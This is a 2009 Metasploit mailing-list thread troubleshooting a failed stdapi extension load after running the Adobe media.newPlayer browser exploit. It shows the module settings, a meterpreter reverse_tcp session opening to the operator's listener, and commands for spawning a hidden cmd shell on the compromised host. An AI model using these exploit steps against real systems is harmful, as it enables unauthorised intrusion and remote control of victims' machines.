Re: AutoloadStdAPI Failing

[dnc <daniloleke () gmail com>]

Hi Jonathan after a sent the e-mail that i saw that there is a ipconfig
command in meterpreter...

Sorry


[]'s DNC


On Thu, Dec 17, 2009 at 8:57 PM, dnc <daniloleke () gmail com> wrote:

> ipconfig isn't a meterpreter command,
> you should use "execute -f WINDOWS_COMMAND"
>
> for instance:
> meterpreter > execute -H -f  ipconfig
>
>
> You can load an cmd shell using:
>
> meterpreter > execute -H -i -f cmd
> Process 1092 created.
> Channel 1 created.
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
>
> C:\>
>
>
> []'s DNC
>
>
> On Thu, Dec 17, 2009 at 5:28 PM, Jonathan Cran <jcran () 0x0e org> wrote:
>
> > having trouble loading the stdapi with the new adobe_media_newplayer
> > exploit
> >
> >
> > msf exploit(adobe_media_newplayer) > set
> >
> > Global
> > ======
> >
> > No entries in data store.
> >
> > Module: windows/browser/adobe_media_newplayer
> > =============================================
> >
> >   Name                      Value
> >   ----                      -----
> >   AutoLoadStdapi            true
> >   AutoRunScript
> >   DLL
> > /media/truecrypt1/toolkit/nix/framework-net/metasploit-svn/data/meterpreter/metsrv.dll
> >   DisablePayloadHandler     false
> >   EXITFUNC                  process
> >   EnableContextEncoding     false
> >   HTML::base64              none
> >   HTML::javascript::escape  0
> >   HTML::unicode             none
> >   HTTP::chunked             false
> >   HTTP::compression         none
> >   HTTP::header_folding      false
> >   HTTP::junk_headers        false
> >   LHOST                     10.20.40.42
> >   LPORT                     4444
> >   ReverseConnectRetries     5
> >   SRVHOST                   0.0.0.0
> >   SRVPORT                   8080
> >   SSL                       false
> >   SSLVersion                SSL3
> >   TARGET                    0
> >   TCP::max_send_size        0
> >   TCP::send_delay           0
> >   URIPATH                   xx
> >   payload                   windows/meterpreter/reverse_tcp
> >
> > msf exploit(adobe_media_newplayer) >
> > msf exploit(adobe_media_newplayer) > exploit
> > [*] Sending Adobe Doc.media.newPlayer Use After Free Vulnerability to
> > 10.11.32.4:4092...
> > [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
> > [*] Sending stage (2650 bytes)
> > [*] Sleeping before handling stage...
> > [*] Uploading DLL (723467 bytes)...
> > [*] Upload completed.
> > [*] Meterpreter session 5 opened (10.20.40.42:4444 -> 10.11.32.4:4093)
> > msf exploit(adobe_media_newplayer) > sessions -i 5
> > [*] Starting interaction with 5...
> > meterpreter > ipconfig
> > [-] Unknown command: ipconfig.
> > meterpreter > use stdapi
> > Loading extension stdapi...
> > [-] Failed to load extension: No such file or directory -
> > /media/truecrypt1/toolkit/nix/framework-net/metasploit-svn/data/meterpreter/ext_server_stdapi.generic
> >
> >
> >
> > .generic doesn't seem to exist:
> >
> > jcran@aldatmak:/media/truecrypt1/toolkit/nix/framework-net/metasploit-svn/data/meterpreter$
> > ls
> > ext_server_espia.dll          ext_server_priv.x64.dll    metsrv.dll
> > ext_server_espia.x64.dll      ext_server_sniffer.dll     metsrv.x64.dll
> > ext_server_incognito.dll      ext_server_stdapi.dll      metsvc.exe
> > ext_server_incognito.x64.dll  ext_server_stdapi.x64.dll  metsvc-server.exe
> >
> > ext_server_priv.dll           metcli.exe
> >
> >
> > jcran
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework